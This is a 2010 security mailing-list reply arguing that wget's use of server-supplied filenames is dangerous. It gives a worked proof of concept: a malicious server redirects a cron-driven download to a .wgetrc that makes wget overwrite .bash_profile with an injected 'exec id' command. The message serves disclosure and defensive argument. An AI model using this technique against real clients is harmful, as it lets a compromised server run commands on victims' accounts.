Date: Wed, 19 May 2010 03:42:29 +0400
From: Solar Designer <solar@...nwall.com>
To: oss-security@...ts.openwall.com
Subject: Re: [oCERT-2010-001] multiple http client unexpected download filename vulnerability

On Tue, May 18, 2010 at 09:50:27AM +0200, Ludwig Nussel wrote:
> wget doesn't overwrite existing files by default anyways. Instead it appends a
> suffix .1, .2 etc to the newly downloaded file.

Well, a server can sometimes override that default - please see below.

> wget also prints the file name it used.

This is of limited help - and for interactive uses only.  I am mostly
concerned about uses from cron jobs and the like.

> So IMO it's perfectly fine and useful for wget to take the server
> provided file name by default.

I disagree.  Uses from scripts and cron jobs are too common, and they
often don't care to specify an output filename explicitly.

Let's suppose there's a cron job like this:

1 * * * *	wget http://www.openwall.com/pvt/wget/log &> /dev/null

If the server is malicious or compromised, it can have:

RedirectMatch log $1/pvt/wget/.wgetrc

in .htaccess, and

reject=; exec id
output-document=.bash_profile

in .wgetrc.  When the cron job runs for the first time after the above
changes made on the server, it does:

02:01:02 (2.64 MB/s) - `.wgetrc' saved [47/47]

At this point, .wgetrc is on the client system.  The second time the
cron job runs, it does:

03:01:02 (2.99 MB/s) - `.bash_profile' saved [47/47]

This has happily overwritten my .bash_profile file.

(I replaced "/dev/null" in the cron job with another filename for
obtaining these wget output lines.)

When I am logging in to the affected account, I get the output of "id".
Of course, the shell command could as well be nastier than that.

Although I used a somewhat tricky approach in the above exploit,
eventually making wget overwrite a file, it is also possible to mount
attacks that do not rely on overwriting any files.  Many programs
support optional startup/config files of fixed/known/guessable names
that a malicious or compromised server could provide.  In fact, I've
just demonstrated this attack against wget itself, but it could also
work against another program.

Is this more convincing now?

Alexander